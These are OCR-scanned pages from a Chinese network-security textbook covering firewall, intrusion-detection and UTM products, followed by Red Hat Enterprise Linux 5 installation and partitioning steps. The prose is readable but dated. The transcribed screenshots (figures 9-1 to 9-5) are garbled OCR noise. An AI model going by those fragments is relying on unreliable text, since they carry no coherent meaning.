CheckPoint Firewall-l 防火 墙 的 操作 在 操作 系统 的 核心 层 , 而 不 是 在 应 用 程序 上 进行 ， 
让 防火 墙 系统 达到 最 高 的 性 能 .最 佳 的 扩展 与 升级 , 它 支持 基于 Web 的 多 媒体 和 UDP 应 用 
程序 ,采用 多 重 验证 模板 和 方法 ,使 网 络 管理 员 非 常 简单 地 验证 客户 端 .会 话 和 用 户 对 网 络 
的 访问 。 而 CheckPoint 由 于 架构 不 依赖 硬件 ,因此 ,在 理论 上 ,功能 是 可 以 无 限 扩充 的 , 它 
能 给 客户 更 多 的 控制 和 定制 功能 。 同 时 , 它 是 一 个 跨 平台 防火 墙 系统 , 目 前 支持 Windows 
98/NT/2000/XP/2003/2008、Sun OS、SunSolaris、IBM AIX、HP-UN,、FreeBSD 以 及 各 类 
Linux 系统 。 就 目前 来 讲 ,CheckPoint Firewall-1 是 全 球 认可 的 软件 防火 墙 产品 。 但 是 , 价 
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格 偏 高 是 该 产品 的 一 个 不 足 之 处 。 
4. NAI Gauntlet 


这 是 一 种 基于 软件 的 防火 墙 ,支持 Windows NT/2003/2008 和 UNIX 系统 。 作 为 基于 
应 用 层 网 关 的 Gauntlet 防火 墙 , 集 成 了 Windows NT 的 性 能 管理 和 易 用 性 ,应 用 层 完全 按 
照 安全 策略 检查 双向 通信 。 它 具有 用 户 透 明 、 集 成 管理 .强力 加 密 、 内 容 安全 和 高 吞吐 量 的 
特性 ,可 以 用 于 Internet Intranet 和 远程 访问 。Gauntlet 具有 友好 的 管理 界面 ,可 以 运行 在 
Web 浏览 器 中 ,支持 远程 管理 和 配置 ,可 以 从 网 络 平台 上 监控 和 配置 ,如 Windows NT 
Server 和 HP Open-View。Gauntlet 还 支持 通过 服务 器 ,企业 内 部 网 、Internet 来 存 取 和 管 
理 SNMP 设备 。Gauntlet 防火 墙 支 持 流行 的 多 媒体 实时 业务 ,如 VDOLive、 Real Audio/ 
Video 和 Microsoft NetShow。 

表 8-3 列 出 了 国内 外 典型 防火 墙 产品 的 信息 统计 。 其 中 包括 常见 的 企业 级 防火 墙 产品 
和 个 人 防火 墙 产 品 。 

表 8-3 国内 外 典型 防火 墙 产品 信息 统计 


防火 墙 厂商 防火 墙 产品 名 称 防火 墙 厂商 防火 墙 产 品名 称 
Cisco Cisco PIX 启明 星 展 天 清 汉 马 防 火 墙 
CheckPoint CheckPoint 瑞星 公司 瑞星 个 人 防火 墙 
NetScreen NetScreen 天 网 安全 实验 室 天 网 个 人 防火 墙 
华为 Quidway SecPath 联想 联想 网 御 
天 融 信 NetGuard 


8.8.2 入 侵 检 测 产品 


目前 国外 一 些 研究 机 构 已 经 开发 出 了 应 用 于 不 同 操作 系统 的 几 种 典型 的 入 侵 检测 系统 
(IDS) ,这 些 IDS 的 检测 基本 是 基于 服务 器 或 基于 网 络 的 。 下 面 对 一 些 国外 及 国内 公司 的 
产品 进行 介绍 。 

目前 主要 的 IDS 生产 商 与 产品 有 : 国外 Cisco 公司 的 NetRanger; Internet Security 
System 公司 的 RealSecure; 国内 的 有 紫光 网 络 的 UnisIDS; 重庆 爱 思 软 件 技术 有 限 公 司 的 
ODD_NIDS。 下 面 分 别 介绍 这 些 人 侵 检 测 产品 。 

1. Cisco 公司 的 NetRanger 


NetRanger 产品 分 为 两 部 分 : 监测 网 络 包 和 发 告警 的 传感器 ,以 及 接收 并 分 析 告 警 和 
启动 对 策 的 控制 器 。NetRanger 以 其 高 性 能 而 闻名 ,而且 它 还 非常 易于 组 合 。 控 制 器 程序 
可 以 综合 多 站 点 的 信息 并 监视 散布 在 整个 企业 网 上 的 攻击 。NetRanger 最 大 的 特点 在 于 其 
是 针对 企业 而 设计 的 。 

NetRanger 在 全 球 广域网 上 运行 很 成 功 。 例 如 , 它 有 一 个 路 径 备份 (Path-doubling) 功 
能 。 如 果 一 条 路 径 断 掉 了 ,信息 可 以 从 备份 路 径 上 传 过 来 。 它 还 可 以 做 到 从 一 个 点 上 监测 
全 网 或 把 监测 权 转 给 第 三 方 。NetRanger 的 另 一 个 强项 是 其 在 检测 问题 时 不 仅 观察 单个 包 
的 内 容 , 而 且 还 根据 上 下 文 进行 综合 判断 , 即 从 多 个 包 中 得 到 线索 。 这 是 很 重要 的 一 点 , 因 
为 入侵 者 可 能 以 字符 模式 存 取 一 个 端口 ,然后 在 每 个 包 中 只 放 一 个 字符 。 如 果 一 个 监测 器 
只 观察 单个 包 , 它 就 永远 不 会 发 现 完整 的 信息 。 可 以 说 NetRanger 是 目前 市 场 上 基于 网 络 
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的 入 侵 检测 软件 中 经 受 实践 考验 最 多 的 产品 之 一 。 

但 是 ,对 于 某 些 用 户 来 讲 ,NetRanger 的 强项 也 可 能 正好 是 其 不 足 。 它 被 设计 为 集成 在 
OpenView 或 NetView 下 在 网 络 运行 中 心 (NOC) 使 用 ,并 且 在 配置 该 系统 时 需要 对 UNIX 
有 详细 的 了 解 。 另 外 ,NetRanger 相对 较 昂贵 ,这 对 于 一 般 的 局 域 网 来 讲 未 必 很 适合 。 

Network Associates 公司 的 CyberCop NetWork Associates 从 Cisco 那里 取得 授权 ,将 
NetRanger 的 引擎 和 攻击 模式 数据 库 用 在 CyberCop 中 ,然后 将 CyberCop 设计 成 一 个 网 络 
应 用 程序 ,该 程序 在 20min 内 就 可 以 安装 完毕 。 它 预 设 了 6 种 通常 的 配置 模式 ,分 别 适用 于 
Windows NT 和 UNIX 的 混合 子 网 .UNIX 子 网 .NT 子 网 、 远 程 访问 、 前 沿 网 和 骨干 网 。 不 
过 与 NetRanger 相 比 ,CyberCop 缺乏 一 些 企业 应 用 的 特征 ,如 路 径 备 份 功能 等 。 

2. Internet Security System 公司 的 RealSecure 

RealSecure 的 优势 在 于 其 简洁 性 和 低 价 格 。 与 NetRanger 和 CyberCop 类 似 ， 
RealSecure 在 结构 上 也 由 两 部 分 组 成 。 引 擎 部 分 负责 监测 信息 包 并 生成 报警 信息 ,控制 台 
负责 接收 报警 信息 并 作为 配置 及 产生 数据 库 报告 的 中 心 点 。 两 部 分 都 可 以 在 Windows 
NT ,Solaris、SunOS 或 Linux 的 环境 中 运行 ,并 可 以 在 混合 的 操作 系统 或 匹配 的 操作 系统 
环境 下 使 用 。 它 们 都 能 在 商用 微型 计算 机 上 运行 。 

对 于 一 个 小 型 的 系统 ,可 以 将 RealSecure 的 引擎 和 控制 台 放 在 同一 台 计 算 机 上 运行 ， 
这 比 起 NetRanger 或 CyberCop 来 都 强 。RealSecure 的 引擎 价值 一 万 美元 左右 ,控制 台 是 
免费 的 。 一 个 引擎 可 以 向 多 个 控制 台 报告 ,一 个 控制 台 也 可 以 管理 多 个 引擎 。 

另外 ,RealSecure 可 以 对 CheckPoint Software 公司 生产 的 FireWall-l 防火 墙 重新 进行 
配置 ,ISS 还 计划 使 其 能 对 Cisco 的 路 由 器 进行 重新 配置 ,同时 也 正在 开发 OpenView 下 的 
应 用 。 这 些 都 说 明 ISS 公司 在 努力 提高 产品 性 能 的 同时 ,也 非常 注重 与 相关 网 络 安全 公司 
产品 的 配合 。 

3. 紫光 网 络 公司 的 UnisIDS 

UnisIDS 主要 包括 管理 中 心 Admin .基于 网 络 的 入 侵 检测 引擎 Network Agent 和 基于 
主机 的 入 侵 检测 引擎 Host Agent 三 个 模块 ,用 户 可 根据 需要 选用 相应 的 模块 。 

UnisIDS 是 一 个 实时 监测 黑客 入侵、 报警 .响应 和 防范 的 入侵 检测 系统 ,并 真正 实现 了 
基于 主机 检测 功能 和 基于 网 络 检测 功能 的 无 颖 集成 。UnisIDS 通过 对 系统 事件 和 网 络 上 传 
输 的 数据 进行 实时 监视 和 分 析 , 一 旦 发 现 可 疑 的 入 侵 行 为 和 异常 数据 包 , 立 即 报警 并 做 出 响 
应 ,使 用 户 的 系统 在 受到 破坏 之 前 就 能 够 及 时 截取 和 终止 非法 的 入 侵 , 停 止 内 部 网 络 的 误 
用 ,从 而 在 最 大 程度 上 降低 系统 安全 风险 ,达到 有 效 保护 系统 资源 和 数据 的 目的 。 

UnisIDS 入 侵 检测 系统 适用 于 各 种 不 同 规模 的 网 络 ,其 主要 的 用 户 对 象 是 各 个 单位 的 
网 络 安全 管理 者 、 各 信息 安全 咨询 公司 ,信息 安全 法 律 执行 机 关 、 大 中 型 企业 、ISP、ICP、 教 
育 以 及 政府 机 构 。 它 可 以 满足 企业 系统 安全 的 需求 .同时 具有 容易 安装 、 方 便 管理 的 优点 ， 
并 可 大 大 节省 网 络 执行 和 设备 购置 方面 的 整体 成 本 。 

UnisIDS 采用 了 多 项 革新 性 技术 ,具有 很 好 的 可 伸缩 性 , 它 可 以 在 不 影响 网 络 性 能 的 基 
础 上 通过 设置 多 台 引 擎 监视 并 控制 每 个 子 网 内 部 的 活动 。 它 可 以 从 设置 的 每 个 引擎 收集 资 
料 并 进行 集中 管理 ,通过 检测 发 生 在 TCP/IP 上 的 所 有 可 能 的 危险 因素 来 提高 安全 性 。 同 
时 每 个 引擎 都 具有 自我 防护 的 功能 ,这 也 进一步 提高 了 系统 安全 人 性。 


224 网 络 安全 教程 及 实践 


8.8.3 UTM 简介 


UTM 即 统一 威胁 管理 (Unified Threat Management) 。2004 年 9 月 ,IDC 首 度 提出 “ 统 
一 威胁 管理 ”的 概念 ,将 防 病 毒 、 入 侵 检 测 和 防火 墙 安全 设备 划 归 统一 威胁 管理 这 一 新 的 类 
别 。 由 IDC 提出 的 UTM 是 指 由 硬件 .软件 和 网 络 技术 组 成 的 具有 专门 用 途 的 设备 , 它 主 
要 提供 一 项 或 多 项 安全 功能 ,将 多 种 安全 特性 集成 于 一 个 硬件 设备 里 ,构成 一 个 标准 的 统一 
管理 平台 。 从 这 个 定义 上 来 看 ,IDC 既 提 出 了 UTM 产品 的 具体 形态 ,又 涵盖 了 更 加 深远 的 
逻辑 范畴 。 从 定义 的 前 半 部 分 来 看 ,众多 安全 厂商 提出 的 多 功能 安全 网 关 、 综 合 安全 网 关 、 
一 体 化 安全 设备 等 产品 都 可 被 划 归 到 UTM 产品 的 范畴 ; 而 从 后 半 部 分 来 看 ,UTM 的 概念 
还 体现 出 在 信息 产业 经 过 多 年 发 展 之 后 ,对 安全 体系 的 整体 认识 和 深刻 理解 。 目 前 ,UTM 
常 定义 为 由 硬件 .软件 和 网 络 技术 组 成 的 具有 专门 用 途 的 设备 , 它 主 要 提供 一 项 或 多 项 安全 
功能 ,同时 将 多 种 安全 特性 集成 于 一 个 硬件 设备 里 ,形成 标准 的 统一 威胁 管理 平台 。UTM 
设备 应 该 具备 的 基本 功能 包括 网 络 防 火 墙 、 网 络 入 侵 检测 /防御 和 网 关 防 病毒 功能 。 

虽然 UTM 集成 了 多 种 功能 ,但 却 不 一 定 要 同时 开启 。 根 据 不 同 用 户 的 不 同 需 求 以 及 
不 同 的 网 络 规模 ,UTM 产品 分 为 不 同 的 级 别 。 也 就 是 说 ,如 果 用 户 需 要 同时 开启 多 项 功 
能 , 则 需要 配置 性 能 比较 高 ,功能 比较 丰富 的 产品 。 

目前 国内 外 主流 安全 厂商 纷纷 进入 UTM 市 场 。2005 年 ,UTM 技术 与 TD-SCDMA、 
WiMAX 等 一 起 被 评 为 年 度 9 大 热点 技术 ; 同年 ,Cisco 的 ASA 系列 UTM 产品 发 布 ,随后 
不 断 对 产品 线 进行 丰富 和 完善 ; Juniper 的 SSG 系列 UTM 产品 发 布 , 覆 盖 了 中 低 端 UTM 
市 场 需求 ; 同年 ,启明 星辰 发 布 天 清 汉 马 系 列 UTM 产品 ,是 国内 首 家 发 布 UTM 产品 的 
厂商 。 

2006 年 ,国外 厂商 CheckPoint、SonicWall、WatchGuard 等 纷纷 加 大 投入 力度 ,加 强 营 
销 和 棠 道 建设 的 投入 ,积极 扩展 市 场 份额 。 国 内 厂商 如 安 氏 领 信 在 2006 年 6 月 发 布 了 
LinkTrust UTM 产品 ,宣称 要 打造 信息 安全 的 瑞士 军刀 ; 联想 网 御 通 过 与 Fortinet 的 
OEM 合作 ,推出 了 UTM 产品 ,同时 成 立 了 专门 的 研发 中 心 , 开 始 UTM 产品 的 技术 积累 ; 
天 融 信 在 原 有 防火 墙 产 品 基 础 上 增加 了 防 病毒 功能 ,推出 UTM 产品。 

2007 年 ,Fortinet 进行 了 全 面 的 产品 切换 ,同时 推出 适用 于 电信 运营 商 使 用 的 机 架 式 设 
备 ; 启明 星辰 于 2007 年 5 月 发 布 了 新 一 代 的 天 清 汉 马 USG 系列 UTM 产品 ,功能 和 易 用 
性 均 有 大 幅 提升 ; Cisco 淡化 了 PIX 防火 墙 产品 ,推出 了 高 端的 ASA5580 产品 ,最 高 性 能 可 
达 万 兆 ; 2007 年 年 底 , 天 融 信也 与 Fortinet 进行 了 OEM 合作 ,全 面 进入 UTM 市 场 。 

当 UTM 在 政府 、 中 小 企业 中 成 为 主流 的 时 候 , 电 信 运 营 商 ,大 型 企业 、 高 校 用 户 也 对 
UTM 颇 为 青睐 ,但 是 UTM 在 上 万 用 户 规模 的 网 络 中 应 用 时 ,性 能 仍然 是 瓶颈 。 

作为 发 展 方向 ,国外 的 Cisco .SonicWall CheckPoint 等 公司 ,国内 的 天 融 信 、 启 明星 搬 
等 公司 已 经 重点 投入 多 核 技术 的 产品 研发 ,并 形成 了 一 定 的 研发 成 果 , 目 前 可 以 在 多 核 平台 
上 实现 防火 墙 性 能 达到 10G 的 能 力 。 


第 9 章 Linux 操作 系统 的 安全 性 


本 章 学 习 要 求 : 

。 了 解 Linux 系统 的 硬盘 知识 。 

。 掌握 安装 Linux 系统 的 基本 过 程 。 

。 掌握 Webmin 的 安装 与 设置 ,学 会 使 用 Webmin 配置 各 种 服务 。 
。 掌握 Samba 服务 的 概念 、 原 理 、 安 装 以 及 配置 。 

。 掌握 DNS 服务 的 概念 、 原 理 、 安 装 以 及 配置 。 

。 掌握 MAIL 服务 的 概念 、 原 理 、 安 装 以 及 配置 。 

。 掌握 WEB 服务 的 概念 ,原理 ,安装 以 及 配置 。 

。 熟悉 Linux 系统 的 安全 防范 方法 。 

。 熟悉 Linux 系统 的 基本 安全 工具 。 


9.1 Red Hat Enterprise Linux 5 系统 的 安装 


9.1.1 Red Hat Enterprise Linux 5 安装 前 的 准备 工作 


在 安装 Linux 系统 之 前 ,首先 要 对 自己 的 硬件 环境 和 安装 方式 有 一 定 的 了 解 ,这 样 才能 
使 系统 运行 的 更 好 。 在 这 里 给 出 4 点 建议 , 供 参考 。 

1. 硬件 要 求 

安装 Red Hat Enterprise Linux 5 的 硬件 要 求 如 下 。 

。 CPU: Pentium 以 上 处 理 器 。 

。 内 存 : 至 少 128MB, 推 荐 使 用 256MB 以 上 的 内 存 。 

。 硬 盘 : 至 少 需要 1GB 以 上 的 硬盘 空间 ,完全 安装 需 大 约 5GB 的 硬盘 空间 。 

。 显 卡 : VGA 兼容 显卡 。 

。 光 驱 : CD-ROM/DVD-ROM。 

。 其 他 设备 : 如 声卡 、 网 卡 和 Modem 等 。 

。 软驱 : 可 选 。 

2. 系统 硬件 设备 型 号 

为 了 能 够 正确 安装 Red Hat Enterprise Linux, 安 装 前 最 好 先 了 解 系统 硬件 设备 的 具体 
型 号 (如 鼠标 、 网 卡 ` 显 卡 、 显 示 器 等 )。 这 些 信息 最 好 参考 购买 时 的 硬件 配置 清单 ,如 果 没 
有 ,可 在 系统 的 设备 管理 器 中 查看 。 方 法 是 在 Windows 系统 中 , 右 击 桌 面 上 的 “我 的 电脑 ” 
图 标 , 在 出 现 的 菜单 中 选择 “管理 ”命令 ,打开 “计算 机 管理 ”后 ,选择 左 侧 列表 中 的 “设备 管理 
器 ? 即 可 查看 。 

Red Hat 网 站 提供 了 经 过 兼容 性 测试 和 认证 的 “硬件 兼容 性 列表 ”, 在 得 到 系统 硬件 设 
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备 的 具体 型 号 后 ,建议 访问 https://hardware. redhat. com/ 来 查看 用 户 的 配置 是 否 在 清单 
之 中 。 

3. 与 其 他 操作 系统 并 存 

Linux 支持 在 一 台 计 算 机 中 安装 多 个 操作 系统 , 它 使 用 GRUB 多 重启 动 管理 器 来 支持 
多 操作 系统 并 存 ,GRUB 可 以 引导 DOS 和 Windows 等 多 种 操作 系统 ,计算 机 启动 时 ,用 户 
可 以 使 用 GRUB 提供 的 菜单 选择 需要 启动 的 系统 。 不 必 担 心 出 现 安装 了 Linux 后 ,其 他 操 
作 系 统 不 可 用 的 问题 。 

4. Red Hat Enterprise Linux 5 各 种 安装 方式 

Red Hat Enterprise Linux 5 支持 以 下 几 种 安装 方式 。 

。 光盘 安装 : 直接 用 安装 光盘 的 方式 进行 安装 ,这 种 方式 是 最 简单 也 是 最 常用 的 办 

法 ,推荐 初学 者 使 用 。 
。 硬盘 安装 : 将 ISO 安装 光盘 映像 文件 复制 到 硬盘 上 进行 安装 。 
。 网 络 安装 : 可 以 将 系统 安装 文件 放 在 Web、FTP 或 NFS 服务 器 上 ,通过 网 络 安装 。 


9.1.2 Red Hat Enterprise Linux 5 系统 下 硬盘 的 基本 知识 


硬盘 用 来 可 靠 地 存储 和 检索 数据 ,在 硬盘 分 区 之 前 用 户 需 要 了 解 Linux 系统 下 硬盘 的 
相关 知识 。 
1. 文件 系统 
Linux 支持 多 种 文件 系统 , 它 支持 的 文件 系统 有 ext、ext2、ext3、hpfs、iso9600、ntfs 等 ， 
且 可 以 和 其 他 操作 系统 并 存 。ext3 文件 系统 是 ext2 文件 系统 的 升级 版 本 , 它 是 一 种 日 志文 
件 系统 ,在 使 用 ext3 的 文件 系统 时 ,就 算 遇 到 非法 关机 的 情况 ,数据 的 完整 性 也 能 得 到 保 
存 。 所 以 Red Hat Enterprise Linux 使 用 ext3 作为 其 默认 的 文件 系统 。 
2. Red Hat Enterprise Linux 硬盘 分 区 命名 
Linux 系统 使 用 一 种 更 加 灵活 的 命名 方案 .该 命名 是 基于 文件 的 ,文件 的 格式 为 /dev/ 
xxyN ,下 面 详细 介绍 linux 系统 的 命名 方法 。 
。 /dev/: 这 个 字符 串 是 所 有 设备 文件 所 在 的 目录 名 。 因 为 分 区 位 于 硬盘 上 ,而 硬盘 
是 设备 ,所 有 这 些 文件 代表 了 在 /dev/ 上 所 有 可 能 的 分 区 。 
。 xx: 分 区 名 的 前 两 个 字母 标明 分 区 所 在 设备 的 类 型 ,通常 是 hd(IDE 磁盘 ) 或 sd 
(SCSI 磁盘 ) 。 
。 y: 这 个 字母 标明 分 区 所 在 的 设备 。Linux 对 连接 到 IDE 接口 的 硬盘 使 用 /dev/hdy 
的 方式 命名 ,y 的 值 对 应 于 硬盘 安装 的 位 置 ,y 值 可 以 是 a,b,c,d 等 , 表 9-1 列 出 安 
装 在 不 同位 置 上 的 IDE 硬盘 的 名 称 。 连 接 到 SCSI 设备 使 用 ID 号 进行 区 别 ,SCSI 
设备 的 ID 号 为 0 一 15,SCSI 接口 卡 本 身 的 ID 是 7。Linux 对 连接 到 SCSI 接口 卡 的 
硬盘 使 用 /dev/sdy 的 方式 命名 ,y 的 值 也 可 以 是 a,b,c,d 等 , 即 ID 号 为 0 的 SCSI 
的 硬盘 名 为 /dev/sda,ID 号 为 1 的 SCSI 硬盘 名 为 /dev/sdb, 以 此 类 推 。 
。N: 最 后 的 数字 N 代表 分 区 。 对 于 主 分 区 (或 扩展 分 区 ) 的 编号 为 1 一 4, 逻 辑 分 区 的 
分 区 号 码 编号 从 5 开始 ,可 以 根据 表 9-2 来 理解 。 
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表 9-1 Linux 对 连接 到 IDE 接口 硬盘 的 命名 


硬 盘 名 称 硬 盘 名 称 
IDE1 口 的 主 盘 /dev/hda IDE2 口 的 主 盘 /dev/hde 
IDE1 口 的 从 盘 /dev/hdb IDE2 口 的 从 盘 /dev/hdd 


3. Red Hat Enterprise Linux 的 分 区 方案 
安装 Red Hat Enterprise Linux 时 ,需要 在 硬盘 上 建立 Linux 使 用 的 分 区 ,在 大 多 情况 
下 ,至 少 需要 为 Linux 建立 以 下 三 个 分 区 。 

。 /boot 分 区 : /boot 分 区 用 于 引导 系统 , 它 包 含 操作 系统 的 内 核 和 在 启动 系统 过 程 中 
所 要 用 到 的 文件 ,该 分 区 的 大 小 一 般 为 100MB。 

。 swap 分 区 : swap 分 区 的 作用 是 充当 虚拟 内 存 , 其 大 小 通常 是 物理 内 存 的 两 倍 左右 
( 当 物 理 内 存 大 于 512MB 时 ,swap 分 区 为 512MB 即 可 ) 。 

。/( 根 ) 分 区 : Linux 将 大 部 分 的 系统 文件 和 用 户 文件 都 保存 在 /( 根 ) 分 区 上 ,所 以 该 
分 区 要 一 定 足够 大 ,一般 要 求 大 于 5GB。 

表 9-2 Linux 分 区 命名 方法 示例 


名 称 说 明 

/dev/hda IDE1 口 的 主 盘 

/dev/hdal IDE1 口 的 主 盘 的 第 一 个 分 区 ( 主 分 区 或 扩展 分 区 ) 
/dev/hda2 IDE1 口 的 主 盘 的 第 二 个 分 区 ( 主 分 区 或 扩展 分 区 ) 
/dev/hda3 IDE1 口 的 主 盘 的 第 三 个 分 区 ( 主 分 区 或 扩展 分 区 ) 
/dev/hda4 IDE1 口 的 主 盘 的 第 四 个 分 区 ( 主 分 区 或 扩展 分 区 ) 
/dev/hda5 IDE1 口 的 主 盘 的 第 一 个 逻辑 分 区 

/dev/hdd IDE2 口 的 从 盘 

/dev/hdd2 IDE2 口 的 从 盘 第 二 个 分 区 ( 主 分 区 或 扩展 分 区 ) 
/dev/hdd7 IDE2 口 的 从 盘 第 三 个 逻辑 分 区 

/dev/sda ID 号 为 0 的 SCSI 硬盘 

/dev/sda4 ID 号 为 0 的 SCSI 硬盘 第 四 个 分 区 ( 主 分 区 或 扩展 分 区 ) 
/dev/sdcl 了 D 号 为 2 的 SCSI 硬 盘 第 一 个 分 区 ( 主 分 区 或 扩展 分 区 ) 
/dev/sdd6 ID 号 为 3 的 SCSI 硬盘 第 二 个 逻辑 分 区 


9.1.3 Red Hat Enterprise Linux 5 的 安装 步骤 


当 了 解 了 硬件 和 硬盘 的 知识 后 ,下 面 可 以 进行 Linux 的 安装 了 。 

Linux 的 安装 过 程 详细 步骤 如 下 。 

(1) 启动 计算 机 ,进入 BIOS 设置 程序 ,设置 为 从 CD-ROM 启动 ,然后 将 Red Hat 
Enterprise Linux 5 安装 光盘 A 放 入 光驱 ,引导 成 功 后 进入 如 图 9-1 所 示 界 面 。 

(2) 在 “boot: "提示 符 下 按 Enter 键 ,安装 程序 会 提示 用 户 是 否 检 测 安装 光盘 ,这 可 以 
防止 出 现 由 于 安装 光盘 质量 不 好 导致 安装 出 错 的 问题 。 如 果 需 要 检测 安装 光盘 ,可 以 单 击 
OK 按钮 ,这 里 单 击 Skip 按钮 , 跳 过 检测 安装 光盘 。 

(3) 系统 开始 启动 图 形 界面 安装 程序 (如 果 系 统 内 存 小 于 256MB, 则 系统 将 启动 字符 
安装 界面 ) ,然后 出 现 欢迎 安装 界面 , 单 击 Next 按钮 继续 安装 过 程 。 
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RED HAT 
ENTERPRISE LINUX 5 


To install o e in gra 1 mode，press the <ENTER> key 


e in text node, type: linux text <ENTER> 


Use the function keys listed below for nore infornation 


图 9-1 安装 程序 引导 提示 符 


(4) 进入 安装 语言 界面 ,在 此 可 以 选择 安装 过 程 中 使 用 的 语言 ,选择 “简体 中 文 ”。 

(5) 单 击 Next 按钮 ,进入 “键盘 配置 界面 ”, 安 装 程序 会 自动 为 用 户 选取 一 个 通用 的 键 
盘 类 型 (美国 英语 式 ) ,在 此 使 用 默认 即 可 。 

(6) 选择 键盘 类 型 后 , 单 击 “ 下 一 步 ” 按 钮 ,安装 程序 要 求 输入 安装 序列 号 ,如 图 9-2 所 
示 。Red Hat Enterprise Linux 5 只 提供 两 种 类 型 的 安装 光盘 ,一 种 是 Server, 一 种 是 
Desktop, 每 个 类 型 都 包含 该 类 型 版 本 的 所 有 安装 文件 ,通过 不 同 的 安装 序列 号 来 自动 为 用 
户 提 供 不 同 的 安装 类 型 ,如 果 跳 过 安装 序列 号 ,那么 系统 只 安装 核心 服务 器 或 Desktop。 


RED HAT 
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(QB 
坊 照 语 式 IS 
瑞士 德语 式 

瑞士 德语 式 datin1) 


瑞士 法 条 或 安 美 号码 


hE 要 安装 从 的 订阅 里 的 所 支持 的 全 部 软件 包 ， 请 输入 作 的 宏 装 号 码 。 
罗马尼亚 语 式 


甘 国 国际 式 加 安 甘 3 码 : [2515dd4e215225dd| | 


) pots a | 
劳 兰 滞 式 = 

荔 关 河上 4atin) [XGO | | BWel 

英 联 邦 式 

而 兰 语 式 

前 区 二 式 

西 班 本 语 式 

| 阿拉 伯 滞 忒 (azerty) 口 


EE [| ee) | | 外 Fy 


9-2 输入 序列 号 界面 
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(7) 单 击 “ 下 一 步 ”按钮 ,进入 “磁盘 分 区 选择 ”界面 ,有 四 种 选择 ,它们 是 : 

。 在 选 定 的 磁盘 上 删除 所 有 分 区 并 创建 默认 分 区 结构 。 

。 在 选 定 的 驱动 器 上 删除 Linux 分 区 并 创建 默认 的 分 区 结构 。 

。 使 用 选 定 驱 动 器 中 的 空余 空间 并 创建 默认 的 分 区 结构 。 

。 建立 自 定义 的 分 区 结构 。 

(8) 单 击 “ 下 一 步 ” 按 钮 ,进入 “新 建 分 区 ”界面 ,首先 创建 swap 分 区 ,如 图 9-3 所 示 , 用 
相同 的 方法 创建 /分 区 和 /boot 分 区 。 
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| 证 加 为 区 
挂 载 点 (wd) : 
文件 系统 类 型 (D : | swap | 
加 
罗 许 的 红 动 器 (D) : 
一 | 大 小 MeXG): [ms 8| 
新 建 y) LVM(L) 
| [其它 大 小 造 项 = 
设备 回 因 宦 大 小 公 
| 三 而 训 到 动 吕 ”| | 指 写 空间 大 小 MBXU) B 
Jdev/sda 口 使 用 全 部 可 用 空间 @) 
口 强制 为 主义 区 ) | 
- | 
| X HNO 人 OO | 
口 了 六 RAID 设 着 / 属 =-areer 
品类 和 注 iaB) 所 后 退 @) [二 


图 9-3 创建 swap 分 区 

(9) 单 击 “下 一 步 ? 按 钮 ,进入 "引导 装载 程序 "界面 ,在 此 界面 可 以 设置 引导 装载 程序 的 
属性 ,这 里 使 用 默认 即 可 。 

(10) 单 击 * 下 一 步 ?按钮 ,进入 "网络 配置 ?界面 ,选择 默认 即 可 。 

(11) 单 击 “下 一 步 ?按钮 ,进入 区域 选择 ?界面 ,使 用 默认 * 亚 洲 / 上 海 ? 即 可 。 

(12) 单 击 * 下 一 步 ? 按 钮 ,进入 " 根 口令 设置 ?界面 ,在 此 界面 的 设置 中 ,可 以 为 root 管理 
员 设 置 口令 ,root 账号 在 系统 中 具有 最 高 权限 , 它 在 系统 中 可 以 进行 不 受 任何 限制 的 操作 ， 
所 以 这 个 口令 的 设置 要 尽量 复杂 ,下 面 是 对 安全 密码 的 一 些 建议 。 
密码 应 该 足够 长 ,系统 要 求 至 少 6 位 以 上 ,为 了 系统 安全 ,根据 用 户 个 人 习惯 ,适当 
地 增 大 。 

。 密码 应 避免 出 现 个 人 信息 ,如 姓名 、 出 生日 期 的 简写 。 

。 密码 应 避免 使 用 字典 词组 ,如 hello、password 等 。 

。 密码 应 由 大 小 写字 符 ,数字 和 特殊 符号 组 成 。 

(13) 单 击 “下 一 步 ?按钮 ,进入 "软件 定制 选择 ?界面 ,在 此 界面 上 有 两 种 选择 ,分 别 是 
“现在 定制 "和 “ 稍 后 定制 ”, 这 里 选择 “现在 定制 " 复 选 框 。 
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(14) 单 击 “ 下 一 步 ” 按 钮 ,进入 “选择 软件 包 ” 界 面 ,在 这 里 可 以 选择 各 种 服务 的 配置 软 
件 和 安装 基于 源 程序 的 软件 包 , 如 图 9-4 所 示 。 
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桌面 环境 全 日 DNS 名 称 服 务 器 el 
应 用 程序 的 日 FTP 服务 器 

开发 全 口 MysQL 数据 库 | 
全 PostgreSQL 汪 所 和 | 

基本 系统 届 口 Windows 文件 服务 器 | 
虚拟 化 入 口 万 维 网 服务 器 | 
语言 支持 全 日 打印 支持 | 
EETT EE 


辽 组 软件 包 亿 许 您 把 系统 配置 成 新 闻 服 务 器 * 


[De [em | [ww] 
图 9-4 选择 软件 包 界 面 


(15) 单 击 “ 下 一 步 ” 按 钮 ,进入 最 后 确认 界面 ,在 即将 安装 之 前 ,安装 程序 会 让 用 户 做 安 
装 最 后 的 确认 。 

(16) 单 击 “下 一 步 ?系统 将 进行 自动 安装 ,首先 进行 格式 化 文件 系统 ,格式 化 完成 后 自 
动 进 入 “正在 安装 界面 ", 如 图 9-5 所 示 ,安装 过 程 大 概 需要 半 个 小 时 左右 。 
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入 redhat. 


正在 安装 db4-4.3.29-9.fc6.1386 (2 兆 字 节 ) 
蕊 语言 的 Berkeley DB 汐 据 库 库 (版 本 和 * 


| OE 


9-5 正在 安装 界面 
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(17) 系统 安装 完成 后 ,会 自动 重新 启动 ,进入 “欢迎 ”界面 。 

(18) 单 击 “ 前 进 ” 按 钮 ,进入 “许可 协议 ”界面 ,选择 “是, 我 同意 这 个 许可 协议 ”。 
(19) 单 击 “ 前 进 ” 按 钮 ,进入 “防火 墙 设置 "界面 .使 用 默认 即 可 。 

(20) 单 击 “ 前 进 ” 按 钮 ,进入 “SELinux 设置 界面 ,使 用 默认 即 可 。 

(21) 单 击 “ 前 进 ” 按 钮 .进入 *Kdump 设置 "界面 ,使 用 默认 即 可 。 


(22) 单 击 “前 进 ? 按 钮 ,进入 "日 期 和 时 间 设 置 ?界面 ,根据 实际 时 间 设置 正确 的 时 间 。 
(23) 单 击 “ 前 进 ” 按 钮 ,进入 “设置 软件 更 新 界面 ”, 根 据 用 户 的 实际 情况 可 以 选择 “(YY) 


是 ,我 现在 注册 ”和 *(N) 不 ,我 将 在 以 后 注册 ”。 


